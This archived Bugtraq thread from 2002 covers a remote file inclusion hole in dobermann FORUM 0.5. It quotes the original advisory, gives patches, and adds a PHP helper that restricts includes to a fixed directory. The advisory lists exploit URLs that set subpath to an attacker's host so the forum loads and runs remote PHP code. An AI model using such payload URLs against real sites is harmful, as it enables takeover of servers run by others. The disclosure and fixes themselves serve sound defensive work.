RE: dobermann FORUM (php)

From: Mark Stunnenberg (marksgat_private)
Date: Tue Oct 29 2002 - 01:00:22 PST


    Or place a:
    
    --------------------
    <? $subpath = ''; ?>
    --------------------
    Right above the place where the actual $subpath is being set.
    
    Mark
    
    > -----Original Message-----
    > From: Frog Man [mailto:leseulfrogat_private] 
    > Sent: zondag 27 oktober 2002 P 23:53
    > To: bugtraqat_private
    > Subject: dobermann FORUM (php)
    > 
    > 
    > Information :
    > °°°°°°°°°°°°°°
    > Product : dobermann FORUM
    > version : 0.5
    > website : http://www.le-dobermann.com
    > Problem : Include file
    > 
    > PHP Code/location :
    > °°°°°°°°°°°°°°°°°°°
    > entete.php
    > enteteacceuil.php
    > topic/entete.php :
    > ------------------------------------------
    > <?php @include $subpath."banniere.php"; ?>
    > ------------------------------------------
    > 
    > index.php
    > newtopic.php :
    > ------------------------
    > @require "config.php";
    > @include("entete.php");
    > ------------------------
    > 
    > Exploits :
    > °°°°°°°°°°
    > http://[target]/entete.php?subpath=http://[attacker]/
    > http://[target]/enteteacceuil.php?subpath=http://[attacker]/
    > http://[target]/topic/entete.php?subpath=http://[attacker]/
    > http://[target]/index.php?subpath=http://[attacker]/
    > http://[target]/newtopic.php?subpath=http://[attacker]/
    > with
    > http://[attacker]/banniere.php
    > 
    > Patch :
    > °°°°°°°
    > In files :
    > ------------------
    > entete.php
    > enteteacceuil.php
    > topic/entete.php
    > ------------------
    > replace the line :
    > ------------------------------------------
    > <?php @include $subpath."banniere.php"; ?>
    > ------------------------------------------
    > by :
    > ------------------------------------------
    > <?php
    > $banfile=$subpath."banniere.php";
    > if (file_exists($banfile)){
    > @include $banfile; }
    > ?>
    > ------------------------------------------
    > 
    > 
    > 
    > More details in French : 
    > http://www.frog-man.org/tutos/dobermannFORUM.txt
    > translated by Google : 
    > http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
    
    
    frog-m@n
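
The two fixes proposed in this thread (give $subpath a known value before it is used, and check the file before including it) can be combined into one helper, which here goes one step further and confines the resolved path to a fixed directory. This is an added example, not code from dobermann FORUM or from either poster; the function name `safe_banner_path()` and the temporary directory layout are assumptions made for illustration (PHP 7.1 or later).

```php
<?php
// Added example, not dobermann FORUM code. safe_banner_path() and the
// temporary directory layout below are constructed for illustration.

/**
 * Return the absolute path of banniere.php under $baseDir/$subpath,
 * or null if the path is a URL, does not exist, or escapes $baseDir.
 */
function safe_banner_path(string $baseDir, string $subpath): ?string
{
    // Refuse stream wrappers such as http://, ftp:// or php://.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $subpath)) {
        return null;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $subpath . 'banniere.php');
    if ($base === false || $file === false || !is_file($file)) {
        return null;
    }
    // realpath() has collapsed any "../", so a prefix test is reliable.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// Constructed layout: <tmp>/forum/banniere.php is legitimate,
// <tmp>/banniere.php sits outside the forum directory.
$tmp = sys_get_temp_dir() . '/dob_' . bin2hex(random_bytes(4));
mkdir($tmp . '/forum/topic', 0700, true);
file_put_contents($tmp . '/forum/banniere.php', '<?php echo "banner\n";');
file_put_contents($tmp . '/banniere.php', '<?php echo "outside\n";');

// In the application $subpath is set by the script itself; here each
// value stands for what a request could have supplied instead.
$cases = ['', 'topic/../', '../', 'http://[attacker]/'];
foreach ($cases as $subpath) {
    $path = safe_banner_path($tmp . '/forum', $subpath);
    printf("%-22s %s\n", var_export($subpath, true), $path ? 'include' : 'refuse');
    if ($path !== null) {
        include $path;
    }
}

// Clean up the constructed files.
unlink($tmp . '/forum/banniere.php');
unlink($tmp . '/banniere.php');
rmdir($tmp . '/forum/topic');
rmdir($tmp . '/forum');
rmdir($tmp);
```

The first two values resolve to the forum's own banniere.php and are included; `../` and the URL form are refused.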
    
    
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Tue Oct 29 2002 - 08:44:16 PST